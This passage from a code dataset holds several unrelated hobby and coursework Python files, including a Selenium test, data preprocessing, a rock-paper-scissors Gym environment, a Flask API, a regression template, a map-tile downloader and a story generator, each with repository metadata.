driver.find_element(By.CSS_SELECTOR,\"input[class='inputs ui-autocomplete-input valid']\").send_keys(\"del\")\n# # time.sleep(2)\n# countries =driver.find_elements(By.CSS_SELECTOR, \"p[class*='blackText']\")\n# print(len(countries))\n# # for country in countries:\n# # if countries.text ==\"India\":\n# # countries.click()\n# # break\n\n\n# # driver.find_element(By.XPATH,\"//p[text()='Delhi, India']\").click()\n# #vedio 41\n\n# # print(driver.find_element(By.ID,\"autosuggest\").text)\n# assert print(driver.find_element(By.ID,\"autosuggest\").get_attribute(\"value\")) == \"India\"\n\n# *******************************\n\ndriver.get(\"https://rahulshettyacademy.com/AutomationPractice/\")\ntime.sleep(5)\ndriver.find_element(By.XPATH,\"//*[@class='inputs ui-autocomplete-input']\").send_keys(\"ind\")\ntime.sleep(2)\ncountries = driver.find_elements(By.XPATH,\"//*[@class='ui-menu-item-wrapper']\") # //*[@class='ui-menu-item']/div\ntime.sleep(2)\n# countries =driver.find_elements(By.CSS_SELECTOR, \"p[class*='blackText']\")\nprint(len(countries))\nfor country in countries:\n if country.text == \"India\":\n country.click()\n break\n\n\n# driver.find_element(By.XPATH,\"//p[text()='Delhi, India']\").click()\n#vedio 41\n\n# print(driver.find_element(By.ID,\"autosuggest\").text)\nassert print(driver.find_element(By.ID,\"autosuggest\").get_attribute(\"value\")) == \"India\"\n\n\n\n\n\n","repo_name":"darvinjoseph/automation","sub_path":"Keerthana/Demo_15_FindElementTest.py","file_name":"Demo_15_FindElementTest.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25854384940","text":"#%% --------------------------------------------------\n# initialize\n\n# import packages\nimport json\nfrom pathlib import Path\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom clean_agencies import *\nfrom columns_to_date import *\n\n# set directory path\np = Path.cwd()\ndata_dir = p.parent.joinpath('data', 'raw')\nif data_dir.exists():\n pass\nelse:\n print(\"Directory doesn't exist.\")\n\n# ignore warnings\nwarnings.filterwarnings(\"ignore\")\n\n#%% --------------------------------------------------\n# load data\nfilePath = data_dir / r\"documents_endpoint_rules_combo_1994_1999.json\"\nwith open(filePath, \"r\") as f:\n data = json.load(f)\n\n# convert to dataframe and check structure\ndf = pd.DataFrame(data['results'])\ndf.info()\nprint(\"#\", 50 * \"-\")\n\n#%% --------------------------------------------------\n# Examine target labels\n# categories of documents to examine\nprint(\"All document types: \", df['type'].value_counts(), sep='\\n')\nprint(\"#\", 50 * \"-\")\n\n# filter df of core document types\ncore_types = [\"Notice\", \"Rule\", \"Proposed Rule\", \"Presidential Document\"]\nbool_core = np.array([True if t in core_types else False for t in df['type'].tolist()])\ndfCore = df.loc[bool_core, :]\nprint(\"Labeled documents (4 main types):\", dfCore[\"type\"].value_counts(), sep='\\n')\nprint(\"#\", 50 * \"-\")\n\n# Uncategorized Documents\nbool_uncat = np.array([True if t == \"Uncategorized Document\" else False for t in df['type'].tolist()])\ndfUncat = df.loc[bool_uncat, :]\nprint(\"Unlabeled Documents:\", dfUncat[\"type\"].value_counts(), sep='\\n')\nprint(\"#\", 50 * \"-\")\n\n#%% --------------------------------------------------\n# Data cleaning\n\n# clean up publication date column\ndfCore.loc[:, 'publication_dt'] = column_to_date(dfCore, 'publication_date')\ndfCore.loc[:, 'publication_year'] = dfCore['publication_dt'].apply(lambda x: x.year)\n\n# clean up agencies column\ndfCore = FR_clean_agencies(dfCore, column='agencies')\n\n# fix negative page length; impute with length == 1\nbool_fix = np.array(dfCore['page_length'] <= 0)\ndfCore.loc[bool_fix, 'page_length'] = 1\n\n#%% --------------------------------------------------\n# Create new variables\n\n# count of UQ agencies per document\ndfCore.loc[:, 'agencies_count_uq'] = dfCore['agencies_slug_uq'].apply(lambda x: len(x))\n\n# reformat agency columns\ndfCore.loc[:, 'agencies_slug_uq'] = dfCore['agencies_slug_uq'].apply(lambda x: \"; \".join(x))\ndfCore.loc[:, 'agencies_id_uq'] = dfCore['agencies_id_uq'].apply(lambda x: \"; \".join(list(map(str,x))))\n\n# create abstract length variable\n# simple tokenization of 'abstract' column using whitespace characters\ndfCore.loc[:, 'abstract_tokens'] = dfCore['abstract'].str.split(pat=r'\\s', regex=True)\nabstract_length = [len(a) if a is not None else 0 for a in dfCore.loc[:, 'abstract_tokens']]\ndfCore.loc[:, 'abstract_length'] = abstract_length\n\n# extract page_views count\ndfCore.loc[:, 'page_views_count'] = dfCore['page_views'].apply(lambda x: int(x['count']))\n\n# convert significant to categorical: 0 (false), 1 (true), 2 (unknown/nan)\nbool_na = dfCore['significant'].isna()\ndfCore.loc[bool_na, 'sig'] = 2\nbool_f = dfCore['significant'] == False\ndfCore.loc[bool_f, 'sig'] = 0\nbool_t = dfCore['significant'] == True\ndfCore.loc[bool_t, 'sig'] = 1\nprint(dfCore['sig'].value_counts(dropna=False), '\\n')\n\n# effective date exists\nbool_exists = dfCore['effective_on'].notna()\ndfCore.loc[:, 'effective_date_exists'] = int(0)\ndfCore.loc[bool_exists, 'effective_date_exists'] = int(1)\nprint(dfCore['effective_date_exists'].value_counts(dropna=False), '\\n')\n\n# comments_close_on exists\nbool_exists = dfCore['comments_close_on'].notna()\ndfCore.loc[:, 'comments_close_exists'] = int(0)\ndfCore.loc[bool_exists, 'comments_close_exists'] = int(1)\nprint(dfCore['comments_close_exists'].value_counts(dropna=False), '\\n')\n\n# extract RIN count\ndfCore.loc[:, 'RIN_count'] = dfCore['regulation_id_numbers'].apply(lambda x: len(x))\nprint(dfCore['RIN_count'].value_counts(dropna=False), '\\n')\n\n# extract CFR references count\ndfCore.loc[:, 'CFR_ref_count'] = dfCore['cfr_references'].apply(lambda x: len(x))\nprint(dfCore['CFR_ref_count'].value_counts(dropna=False), '\\n')\n\n# regs dot gov info exists\ndfCore.loc[:, 'docket_exists'] = [0 if x == {} else 1 for x in dfCore['regulations_dot_gov_info']]\nprint(dfCore['docket_exists'].value_counts(dropna=False), '\\n')\n\n# document issued by Executive Office of the President\nbool_na = np.array(dfCore['agencies_count_uq'].notna())\nbool_eop = np.array(dfCore.loc[bool_na, 'agencies_slug_uq'].apply(\n lambda x: 'executive-office-of-the-president' in x.split(\"; \")))\ndfCore.loc[:, 'eop'] = 0\ndfCore.loc[bool_eop, 'eop'] = 1\nprint(dfCore['eop'].value_counts(dropna=False), '\\n')\n\n#%% --------------------------------------------------\n# Text column cleaning\n# these columns: # action; abstract; title; [dates?]\n\n# boolean for filtering presidential documents\n# bool_prez = np.array(dfCore['type'] == \"Presidential Document\") -- better not to use labels to generate features\nbool_eop = np.array(dfCore['eop'] == 1)\n\n# impute missing text: action\nbool_na = np.array(dfCore['action'].isna())\ndfCore.loc[bool_na & bool_eop, 'action'] = 'presidential document'\ndfCore.loc[bool_na & ~bool_eop, 'action'] = dfCore.loc[bool_na & ~bool_eop, 'title'].tolist()\n\n# impute missing text: abstract/summary\nbool_na = np.array(dfCore['abstract'].isna())\ndfCore.loc[bool_na & bool_eop, 'abstract'] = 'presidential document'\ndfCore.loc[bool_na & ~bool_eop, 'abstract'] = dfCore.loc[bool_na & ~bool_eop, 'title'].tolist()\n\n#%% --------------------------------------------------\n# Filter dataframe columns\n\n# columns to keep for modeling\nlabel_col = ['type']\nid_cols = ['document_number', 'citation', 'agencies_id_uq', 'agencies_slug_uq', 'publication_year']\nnum_cols = ['page_length', 'agencies_count_uq', 'abstract_length', 'page_views_count', 'RIN_count', 'CFR_ref_count']\ncat_cols = ['sig', 'effective_date_exists', 'comments_close_exists', 'docket_exists', 'eop']\ntext_cols = ['action', 'abstract', 'title']\nkeep_cols = label_col + id_cols + num_cols + cat_cols + text_cols\n\n# create new dataframe\ndfModeling = dfCore.loc[:, keep_cols].copy()\n\n#%% --------------------------------------------------\n# Export data for modeling\n\n# set directory path\np = Path.cwd()\ndata_dir = p.parent.joinpath('data', 'processed')\nif data_dir.exists():\n pass\nelse:\n try:\n data_dir.mkdir(parents=True)\n except:\n print(\"Cannot create data directory.\")\n\n# save as csv\nfilePath = data_dir / r\"labeled_data_for_modeling.csv\"\nwith open(filePath, \"w\", encoding=\"utf-8\") as f:\n dfModeling.to_csv(f, index_label=\"index\", line_terminator=\"\\n\")\n\n# check if saved\nif filePath.exists():\n print(\"Saved as CSV!\")\nelse:\n print(\"Error saving file.\")\n","repo_name":"mfebrizio/data-mining-project","sub_path":"code/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":6711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4457917814","text":"# -*- coding: utf-8 -*-\n\"\"\"\nじゃんけん対戦するOpenAI Gym 環境クラスを提供するモジュール\n\"\"\"\nimport random\nimport numpy as np\nimport gym\nfrom gym import spaces\n\nclass RockPaperScissorsEnv(gym.Env):\n \"\"\"\n OpenAI Gym 準拠のじゃんけん対戦環境クラス。\n 必要最小限の実装のみ。\n \"\"\"\n def __init__(self, player):\n \"\"\"\n 方策側の相手となる環境側プレイヤーを\n インスタンス変数へ格納し、\n 行動空間・観測空間の定義を行い、\n 観測の初期化を行う。\n 引数:\n player 環境側プレイヤーインスタンス\n 戻り値:\n なし\n \"\"\"\n super().__init__()\n self.player = player\n # 行動空間:0=グー、1=パー、2=チョキ\n self.action_space = spaces.Discrete(2)\n # 観測空間:過去100件分の[方策側行動, 環境側行動]\n self.observation_space = spaces.Box(\n low=0, high=2, shape=(100, 2), dtype=np.int8)\n # 観測初期化\n self.observation = self.init_observation()\n\n def reset(self):\n \"\"\"\n エピソード開始時の観測を取得する。\n インスタンス変数observationの値をそのまま返却する。\n 引数:\n なし\n 戻り値:\n 観測 [ 自分の行動, 敵の行動 ]×100\n \"\"\"\n return self.observation\n\n def step(self, action):\n \"\"\"\n 方策が選択した行動を受け取り、更新後の観測、報酬、\n エピソード完、その他情報(空の辞書)を返却する。\n 引数:\n action 自分の行動\n 戻り値:\n observation 更新後の観測\n reward 報酬値\n done エピソード完(真:完了、偽:あいこ)\n info その他情報(空の辞書)\n \"\"\"\n policy_action = int(action)\n env_action = int(self.player.predict(self.observation))\n self.observation = self.update_observation(\n self.observation, policy_action, env_action)\n reward = self.calc_reward(policy_action, env_action)\n done = self.is_done(policy_action, env_action)\n return self.observation, reward, done, {}\n\n @staticmethod\n def init_observation():\n \"\"\"\n エピソード開始時の観測を取得する。\n 引数:\n なし\n 戻り値:\n observation 観測(初期値)\n \"\"\"\n # 観測初期化\n observation = []\n for _ in range(100):\n # 乱数で初期化\n observation.append([\n random.randrange(2), \n random.randrange(2)])\n return observation\n\n @staticmethod\n def update_observation(observation, policy_action, env_action):\n \"\"\"\n 観測の先頭(最古の両者の手)を削除し、末尾に最新の両者の手を追加して\n 返却する。\n 引数:\n observation 更新対象となる観測\n policy_action 方策側の行動\n env_action 環境側の行動\n 戻り値:\n observation 更新後の観測\n \"\"\"\n observation.pop(0)\n observation.append([policy_action, env_action])\n return observation\n\n @staticmethod\n def is_done(policy_action, env_action):\n \"\"\"\n エピソード完了かどうかを判別する。\n 引数:\n policy_action 方策側の行動\n env_action 環境側の行動\n 戻り値:\n done エピソード完(真:完了、偽:あいこ)\n \"\"\"\n return False if policy_action == env_action else True\n\n @staticmethod\n def calc_reward(policy_action, env_action):\n \"\"\"\n 報酬関数。\n 方策側の行動、環境側の行動から報酬値を算出する。\n 引数:\n policy_action 方策側の行動\n env_action 環境側の行動\n 戻り値:\n 方策側が受け取る報酬値(float)\n \"\"\"\n if policy_action == 0: # 方策側:グー\n if env_action == 1: # 環境側:パー\n return -10\n elif env_action == 2: # 環境側:チョキ\n return 10\n else: # 環境側:グー\n return -1\n elif policy_action == 1: # 方策側:パー\n if env_action == 1: # 環境側:パー\n return -1\n elif env_action == 2: # 環境側:チョキ\n return -10\n else: # 環境側:グー\n return 10\n else: # 方策側:チョキ\n if env_action == 1: # 環境側:パー\n return 10\n elif env_action == 2: # 環境側:チョキ\n return -1\n else: # 環境側:グー\n return -10\n\nclass EvalEnv(RockPaperScissorsEnv):\n \"\"\"\n じゃんけんAI用方策の評価用環境クラス。\n \"\"\"\n # render モード\n metadata = {'render.modes': ['console', 'ansi', 'json']}\n def __init__(self, player):\n \"\"\"\n インスタンス変数infoを初期化する。\n 引数:\n player 環境側プレイヤーインスタンス\n 戻り値:\n なし\n \"\"\"\n super().__init__(player)\n self.info = {\n 'env_id': 'RockPaperScissors-v0', # env id\n 'enemy_player': self.player.__class__.__name__, # 対戦オブジェクトクラス名\n 'episode_no': 0, # 現在のエピソード\n 'step_no': 0, # 現在のステップ\n 'total_reward': 0.0, # エピソード内報酬合計\n }\n\n def reset(self):\n \"\"\"\n エピソード開始時の観測を取得する。\n インスタンス変数observationの値をそのまま返却する。\n 引数:\n なし\n 戻り値:\n 観測 [ 自分の行動, 敵の行動 ]×100\n \"\"\"\n self.info['episode_no'] = self.info['episode_no'] + 1\n self.info['step_no'] = -1.0\n self.info['total_reward'] = 0.0\n return super().reset()\n\n def step(self, action):\n \"\"\"\n 親クラスのstep()を実行し、infoとして実行中ステップ情報を\n 返却する\n 引数:\n action 自分の行動\n 戻り値:\n observation 更新後の観測\n reward 報酬値\n done エピソード完(真:完了、偽:あいこ)\n info その他情報(ステップ情報)\n \"\"\"\n\n observation, reward, done, _ = super().step(action)\n self.info['step_no'] = self.info.get('step_no', -1) + 1\n self.info['total_reward'] = self.info['total_reward'] + reward \n return observation, reward, done, self.info\n\n def render(self, mode='console'):\n \"\"\"\n 環境の状態を可視化する。\n 引数:\n mode console:標準出力、ansi:文字列返却\n 戻り値:\n None: console指定時\n 文字列: ansi指定時\n \"\"\"\n msg = '+++ episode:{}, step:{}, '.format(\n str(self.info['episode_no']), str(self.info['step_no']))\n last_obs = 'recent policy action: ' + str(self.observation[-3][0]) + \\\n ',' + str(self.observation[-2][0]) + \\\n ',' + str(self.observation[-1][0]) \n msg = msg + last_obs\n if mode == 'console':\n print(msg)\n return None\n elif mode == 'ansi':\n return msg\n elif mode == 'json':\n return {\n 'episode_no': self.info['episode_no'],\n 'step_no': self.info['step_no'],\n 'policy_action': self.observation[-1][0],\n 'env_action': self.observation[-1][1],\n 'done': self.is_done(self.observation[-1][0], self.observation[-1][1]),\n 'reward': self.calc_reward(self.observation[-1][0], self.observation[-1][1]),\n 'total_reward': self.info['total_reward'],\n }\n else:\n raise ValueError(f'mode={mode}: no match argument')\n\nclass Player:\n \"\"\"\n プレイヤー基底クラス。\n \"\"\"\n def predict(self, observation):\n \"\"\"\n 引数observationをもとに次の行動を選択する。\n 本実装ではobservationを一切使用せずに、ランダムに行動を選択する。\n 引数:\n observation 観測(使用しない)\n 戻り値:\n ランダムに選択された行動\n \"\"\"\n return random.randrange(2)\n\nclass ProbPlayer(Player):\n \"\"\"\n コンストラクタで渡された各手の確率に従ってランダムに手を出す\n プレイヤークラス。\n \"\"\"\n def __init__(self, prob_list=[0.333, 0.333, 0.334]):\n \"\"\"\n 各手の確率リストをインスタンス変数へ格納する。\n 引数:\n prob_list 各手の確率\n 戻り値:\n なし\n \"\"\"\n self.prob_list = [\n float(prob_list[0])/float(sum(prob_list)),\n float(prob_list[1])/float(sum(prob_list)),\n float(prob_list[2])/float(sum(prob_list)),\n ]\n \n def predict(self, observation):\n \"\"\"\n 引数observationをもとに次の行動を選択する。\n 本実装ではobservationを一切使用せずに、\n 各手の確率に従ってランダムに行動を選択する。\n 引数:\n observation 観測(使用しない)\n 戻り値:\n 各手の確率に従ってランダムに選択された行動\n \"\"\"\n value = random.uniform(0.0, 1.0)\n if value <= self.prob_list[0]:\n return 0 # グー\n elif value <= (self.prob_list[0] + self.prob_list[1]):\n return 1 # パー\n else:\n return 2 # チョキ\n\nclass EnemyPlayer(ProbPlayer):\n \"\"\"\n 1/3の確率でグー・パー・チョキを選択するプレイヤー。\n \"\"\"\n def __init__(self):\n \"\"\"\n prob_list の要素がすべて1/3として親クラスの\n コンストラクタを呼び出す。\n 引数:\n なし\n 戻り値:\n なし\n \"\"\"\n super().__init__(prob_list=[1.0/3.0, 1.0/3.0, 1.0/3.0])\n\nclass JurinaPlayer(Player):\n \"\"\"\n 常に同じ手を出すプレイヤー。\n \"\"\"\n def __init__(self, action=1):\n \"\"\"\n 常に出す手をインスタンス変数へ格納する。\n 引数:\n action 常に出す手(デフォルト:パー)\n \"\"\"\n self.action = action\n\n def predict(self, observstion):\n \"\"\"\n 引数observationをもとに次の行動を選択する。\n 本実装ではobservationを一切使用せずに、\n 常に同じ行動を選択する。\n 引数:\n observation 観測(使用しない)\n 戻り値:\n コンストラクタで指定された行動\n \"\"\"\n return self.action\n\nclass AIPlayer(Player):\n \"\"\"\n 学習済みモデルを使って行動を決めるプレイヤー。\n 学習済みモデルと対戦評価する際に使用する。\n \"\"\"\n def __init__(self, model):\n \"\"\"\n 学習済みモデルをコンストラクタに指定する。\n 引数:\n model 学習済みモデルクラスのインスタンス\n 戻り値:\n なし\n \"\"\"\n self.model = model\n \n def predict(self, observation):\n \"\"\"\n 引数observationをもとに次の行動を選択する。\n 本実装では学習済みモデルクラスのpredictメソッドを使って\n 行動を選択する。\n 引数:\n observation 観測\n 戻り値:\n 学習済みモデルが選択した行動\n \"\"\"\n return int(self.model.predict(observation)[0])\n\n# テスト\n\ndef test_observation():\n env = RockPaperScissorsEnv(Player())\n assert(len(env.observation)==100)\n assert(len(env.observation[0])==2)\n for i in range(100):\n assert(env.observation[i][0] >= 0 and env.observation[i][0]<=2)\n assert(env.observation[i][1] >= 0 and env.observation[i][1]<=2)\n oldest_policy_action = env.observation[1][0]\n oldest_env_action = env.observation[1][1]\n newest_policy_action = 3\n newest_env_action = 4\n env.update_observation(env.observation, newest_policy_action, newest_env_action)\n assert(env.observation[0][0]==oldest_policy_action)\n assert(env.observation[0][1]==oldest_env_action)\n assert(env.observation[99][0]==newest_policy_action)\n assert(env.observation[99][1]==newest_env_action)\n\ndef test_is_done():\n env = RockPaperScissorsEnv(Player())\n assert(env.is_done(0, 0) == False)\n assert(env.is_done(0, 1) == True)\n assert(env.is_done(0, 2) == True)\n assert(env.is_done(1, 0) == True)\n assert(env.is_done(1, 1) == False)\n assert(env.is_done(1, 2) == True)\n assert(env.is_done(2, 0) == True)\n assert(env.is_done(2, 1) == True)\n assert(env.is_done(2, 2) == False)\n\ndef test_calc_reward():\n env = RockPaperScissorsEnv(Player())\n for i in range(3):\n assert(env.calc_reward(i, i)==-1)\n assert(env.calc_reward(0, 1)==-10)\n assert(env.calc_reward(0, 2)==10)\n assert(env.calc_reward(1, 0)==10)\n assert(env.calc_reward(1, 2)==-10)\n assert(env.calc_reward(2, 0)==-10)\n assert(env.calc_reward(2, 1)==10)\n\ndef test_player():\n player = Player()\n prob_player = ProbPlayer(prob_list=[1, 7, 2])\n prob_player_pa = ProbPlayer(prob_list=[0.0, 1.0, 0.0])\n jurina_player = JurinaPlayer(action=1)\n for _ in range(100):\n assert(player.predict(None) in [0, 1, 2])\n assert(prob_player.predict(None) in [0, 1, 2])\n assert(prob_player_pa.predict(None)==1)\n assert(jurina_player.predict(None)==1)\n\ndef test_reset():\n env = RockPaperScissorsEnv(ProbPlayer())\n for _ in range(100):\n assert(env.reset() == env.observation)\n\nif __name__ == '__main__':\n test_observation()\n test_is_done()\n test_calc_reward()\n test_player()\n test_reset()\n","repo_name":"coolerking/rock-paper-scissors","sub_path":"envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":14823,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1831662746","text":"# prog dyn en O(n^2)\n# on garde la solution optimale pour 1, 2, ... n missiles\n# si un missile peut s'inserer derriere le missile n et que sa hauteur est supérieure a la solution actuelle a n+1 missiles,\n# alors on a un nouveau optimum pour n+1 missiles.\n\n\nimport sys\n\nflag = False\nopt = []\nit=0\nwhile True:\n\tline = sys.stdin.readline()\n\tx = int(line)\n\tif x == -1 :\n\t\tif not flag:\n\t\t\tbreak;\n\t\telse:\n\t\t\tit+=1\n\t\t\tif(it!=1):\n\t\t\t\tprint()\n\t\t\tmaximum = str(len(opt))\n\t\t\tprint('Test #'+str(it)+':')\n\t\t\tif maximum != 0:\n\t\t\t\tprint(' maximum possible interceptions: '+str(len(opt)))\n\t\t\telse:\n\t\t\t\tprint('')\n\t\t\topt = []\n\t\t\tflag = False\n\telse:\n\t\tflag = True\n\t\tif len(opt)==0:\n\t\t\topt.append(x)\n\t\telse:\n\t\t\tfor i in reversed(range(len(opt))):\n\t\t\t\tval = opt[i]\n\t\t\t\tif(val>=x):\n\t\t\t\t\tif(i\", methods=[\"GET\"])\ndef get_character_by_id(id):\n response = fetch_one_character(id)\n if response:\n return jsonify(response.dict())\n return jsonify({\"error\": f\"There is no character with the id {id}\"}), 404\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5050)\n","repo_name":"DennisDemir24/thesis-projects","sub_path":"python/flask-rest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13471967867","text":"# This serves as a template which will guide you through the implementation of this task. It is advised\n# to first read the whole template and get a sense of the overall structure of the code\n# First, we import necessary libraries:\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import DotProduct, RBF, Matern, RationalQuadratic, ExpSineSquared\nfrom sklearn.kernel_approximation import PolynomialCountSketch\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.experimental import enable_iterative_imputer\nfrom sklearn.impute import IterativeImputer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef data_loading():\n \"\"\"\n This function loads the training and test data, preprocesses it, removes the NaN values and interpolates the missing\n data using imputation\n\n Parameters\n ----------\n Returns\n ----------\n X_train: matrix of floats, training input with features\n y_train: array of floats, training output with labels\n X_test: matrix of floats: dim = (100, ?), test input with features\n \"\"\"\n # Load training data\n train_df = pd.read_csv(\"P2/train.csv\")\n\n # print(\"Training data:\")\n # print(\"Shape:\", train_df.shape)\n # print(train_df.head(2))\n # print('\\n')\n\n # Load test data\n test_df = pd.read_csv(\"P2/test.csv\")\n\n # print(\"Test data:\")\n # print(test_df.shape)\n # print(test_df.head(2))\n\n # # Dummy initialization of the X_train, X_test and y_train\n # X_train = np.zeros_like(train_df.drop(['price_CHF'], axis=1))\n # y_train = np.zeros_like(train_df['price_CHF'])\n # X_test = np.zeros_like(test_df)\n\n # print(train_df)\n\n # Perform data preprocessing, imputation and extract X_train, y_train and X_test using mean values\n\n # Use interpolation for missing values. Interpolate cannot handle missing starting or end values. So fill these up with mean()\n\n # Why does this not work with RBF?\n\n ### Training set\n\n new_train_df = train_df.interpolate(method=\"akima\")\n new_train_df = new_train_df.fillna(train_df.mean())\n\n # Encode season data\n\n binary_version_seasons = pd.get_dummies(new_train_df['season'])\n new_train_df = new_train_df.drop(columns=['season']).join(binary_version_seasons)\n\n y_train = new_train_df[\"price_CHF\"].to_numpy()\n X_train = new_train_df.drop(columns=[\"price_CHF\"]).to_numpy()\n\n ### Test set\n\n new_test_df = test_df.interpolate(method=\"akima\")\n new_test_df = new_test_df.fillna(new_test_df.mean())\n\n # Encode season data\n\n new_test_df = new_test_df.drop(columns=['season']).join(binary_version_seasons)\n\n X_test = new_test_df.to_numpy()\n\n # Use sklearn imputation\n\n # new_df = train_df.fillna(train_df.mean())\n # y_train = new_df[\"price_CHF\"].to_numpy()\n # X_train = new_df.drop(columns=[\"price_CHF\"]).to_numpy()\n\n # new_test_df = test_df.fillna(test_df.mean())\n # X_test = new_test_df.to_numpy()\n\n print(new_train_df.head())\n print(new_test_df.head())\n\n\n\n assert (X_train.shape[1] == X_test.shape[1]) and (X_train.shape[0] == y_train.shape[0]) and (\n X_test.shape[0] == 100), \"Invalid data shape\"\n return X_train, y_train, X_test\n\n\ndef calculate_R2(y_pred, y):\n\n R2 = r2_score(y, y_pred)\n\n assert np.isscalar(R2)\n return R2\n\n\ndef calculate_RMSE(y_pred, y):\n \"\"\"This function takes test data points (X and y), and computes the empirical RMSE of\n predicting y from X using a linear model with weights w.\n\n Parameters\n ----------\n y_pred: array of floats\n y: array of floats, dim = (15,), input labels\n\n Returns\n ----------\n RMSE: float: dim = 1, RMSE value\n \"\"\"\n\n # Determine mean squared error\n RMSE = mean_squared_error(y, y_pred) ** 0.5\n\n assert np.isscalar(RMSE)\n return RMSE\n\n\ndef modeling_and_prediction(X_train, y_train, X_test):\n \"\"\"\n This function defines the model, fits training data and then does the prediction with the test data\n\n Parameters\n ----------\n X_train: matrix of floats, training input with 10 features\n y_train: array of floats, training output\n X_test: matrix of floats: dim = (100, ?), test input with 10 features\n\n Returns\n ----------\n y_test: array of floats: dim = (100,), predictions on test set\n \"\"\"\n\n # Create storage array for predicted y values\n y_pred1 = np.zeros(X_test.shape[0])\n\n # Leave out seasons data\n # X_train = X_train[:, 1:]\n\n # Define final test data\n X_test1 = X_test\n\n X_train = np.array(X_train)\n y_train = np.array(y_train)\n '''\n gpr = GaussianProcessRegressor(kernel=DotProduct())\n gpr.fit(X_train[:,1:], y_train)\n '''\n\n # Storage array for RMSE values\n RMSE_mat = np.zeros(9)\n R2_mat = np.zeros(9)\n\n # Define n_fold cross validation\n kf = KFold(9)\n mat_i = 0\n\n # Storage for all n_fold models\n models = []\n\n # Perform Cross validation\n for train_index, test_index in kf.split(X_train):\n X_train_folds = X_train[train_index]\n y_train_folds = y_train[train_index]\n\n gpr = GaussianProcessRegressor(kernel=DotProduct())\n gpr.fit(X_train_folds, y_train_folds)\n\n X_test = X_train[test_index]\n y_test = y_train[test_index]\n\n y_pred, sigma = gpr.predict(X_test, return_std=True)\n\n # print(sigma)\n\n models.append(gpr)\n\n RMSE_mat[mat_i] = calculate_RMSE(y_pred, y_test)\n R2_mat[mat_i] = calculate_R2(y_pred, y_test)\n\n mat_i = mat_i + 1\n\n print(RMSE_mat)\n print(R2_mat)\n\n # Determine best model\n best_index_RMSE = np.argmin(RMSE_mat)\n best_index_R2 = np.argmin(R2_mat)\n\n final_gpr_RMSE = models[best_index_RMSE]\n final_gpr_R2 = models[best_index_R2]\n\n # y_pred = final_gpr_RMSE.predict(X_test1[:, 1:])\n y_pred = final_gpr_R2.predict(X_test1[:, :])\n\n\n # print(gpr.score(X_train[:,1:], y_train))\n\n '''\n ps = PolynomialCountSketch(degree=3, random_state=1)\n X_features = ps.fit_transform(X)\n #print(np.exp(X_train[5,1]))\n '''\n # plt.plot(np.exp(X_train[:,1]),np.exp(y_train),'.')\n\n assert y_pred.shape == (100,), \"Invalid data shape\"\n return y_pred\n\n\n# Main function. You don't have to change this\nif __name__ == \"__main__\":\n # Data loaditaFrame(y_png\n X_train, y_train, X_test = data_loading()\n # The function retrieving optimal LR parameters\n y_pred = modeling_and_prediction(X_train, y_train, X_test)\n # Save results in the required format\n\n dt = pd.DataFrame(y_pred)\n\n dt.columns = ['price_CHF']\n print(dt.head(5))\n dt.to_csv('P2/results.csv', index=False)\n print(\"\\nResults file successfully generated!\")\n","repo_name":"IML666/IML-2023","sub_path":"P2/Approaches/template_solution.py","file_name":"template_solution.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16016931141","text":"import urllib.request\nimport os \n\ndef download(x,y,z):\n x = str(x)\n y = str(y)\n z = str(z)\n directory = \"map/\"+x+\"/\"+y+\"/\"\n img = z+\".png\"\n if os.path.isfile(directory+img): return\n if not os.path.exists(directory): os.makedirs(directory)\n\n urllib.request.urlretrieve(\"https://c.tile.openstreetmap.se/hydda/base/\"+x+\"/\"+y+\"/\"+z+\".png\", directory+img)\n print(\"Downloaded \"+directory+img)\n\ndef downloadAll(zoom, centerX, centerY, radius):\n for x in range(centerX-radius,centerX+radius): # Left/Right 247,350\n for y in range(centerY-radius, centerY+radius): # Left/Right 170,200\n download(zoom, x, y)\n\nradius = 20\ndownloadAll(12, 2100, 1420, radius)\ndownloadAll(11, 1060, 715, radius)\ndownloadAll(10, 525, 355, radius)\ndownloadAll(9, 300, 180, radius)\n\n\n","repo_name":"Quesstor/Browsergame","sub_path":"Browsergame/Server/WebServer/static/map/scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73953858401","text":"\n############################################################################\n################## narrative Generator - Joseph Grimer 2016 ####################\n############################################################################\n\n'''\n\njust having fun here... future functionlity\n- currently everything in past tense... and conjugations haven't kicked in.\n- make story a local object passed around?\n\nTwo defining principles of generated narrative interaction:\ngolden rule: love thy neighbour as thyself?\nsilver rule??\n'''\n\n#from vocabulary import * #importa all vocab vars\n\n### main functions\n\n\ndef main():\n\n\tprint(\"Welcome to narrativeGen... Your Personal narrative Generator\")\n\t\n\tpromptForSeed()\n\n\temotionDrivennarrative3()\n\tstory.recount()\n\ndef emotionDrivennarrative3():\n\n\tstory.addPeople2(2)\n\tstory.describePeople()\n\t\n\tstory.blankLine()\n\t\n#\tnarrative begins:\n\tstory.people[0].actOn(story.people[1])\n\tstory.people[1].feel()\n\n\tstory.blankLine() # note: alpha is not affected (yet)\n\n\tfor i in range(1,4):\n\t\tif developnarrative(story.people) == False: # ergo: if the narrative didn't develop\n\t\t\tstory.state([\"-------The Natural End of the 